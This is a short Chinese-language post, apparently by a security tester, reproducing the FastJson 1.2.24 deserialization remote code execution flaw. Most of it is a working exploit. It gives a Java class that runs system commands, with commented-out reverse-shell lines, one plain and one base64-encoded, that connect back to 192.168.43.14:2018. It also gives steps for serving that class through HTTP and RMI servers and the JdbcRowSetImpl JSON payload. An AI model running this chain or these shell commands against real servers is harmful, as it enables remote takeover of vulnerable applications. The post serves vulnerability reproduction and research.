FastJson反序列化RCE

在一次代码审计中，发现了FastJson反序列化RCE漏洞，利用了一波。

影响版本

1.2.24以及之前版本（2017.1）

复现

方法很多，这里直接用https://github.com/iBearcat/FastJson-JdbcRowSetImpl-RCE的方法。

修改 CommandObject.java

import	java.lang.Runtime;
import	java.lang.Process;
public class CommandObject {
    public CommandObject(){
        try{
			Runtime	rt	=	Runtime.getRuntime();
			//Runtime.getRuntime().exec("/bin/bash -i >&/dev/tcp/192.168.43.14/2018<&1");
			//String[] commands = {"bash -c {echo,L2Jpbi9iYXNoIC1pID4mL2Rldi90Y3AvMTkyLjE2OC40My4xNC8yMDE4PCYx}|{base64,-d}|{bash,-i}"};
			
			String[] commands = {"touch","/opt/test"}; //Command
			Process	pc = rt.exec(commands);
			pc.waitFor();
        }catch(Exception e){
            e.printStackTrace();
        }
    }
    public static void main(String[] argv){
        CommandObject e = new CommandObject();
    }
}

编译 CommandObject.java

javac CommandObject.java

开启HTTP服务

python -m SimpleHTTPServer 80

开启RMIServer

java -jar FastJson_JdbcRowSetImpl_JNDI_RMIServer.jar  ip port

发送payload

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://ip:port/Object","autoCommit":true}

其他参考链接

• http://xxlegend.com/2017/04/29/title-%20fastjson%20%E8%BF%9C%E7%A8%8B%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96poc%E7%9A%84%E6%9E%84%E9%80%A0%E5%92%8C%E5%88%86%E6%9E%90/
• https://github.com/shengqi158/fastjson-remote-code-execute-poc
• https://github.com/vulhub/vulhub/tree/master/fastjson/vuln
• https://lazydog.me/post/fastjson-JdbcRowSetImpl-rce-exploit.html
• https://www.cnblogs.com/hac425/p/9800288.html
• https://www.restran.net/2018/10/29/fastjson-rce-notes/
• http://blog.nsfocus.net/fastjson-rce-poc/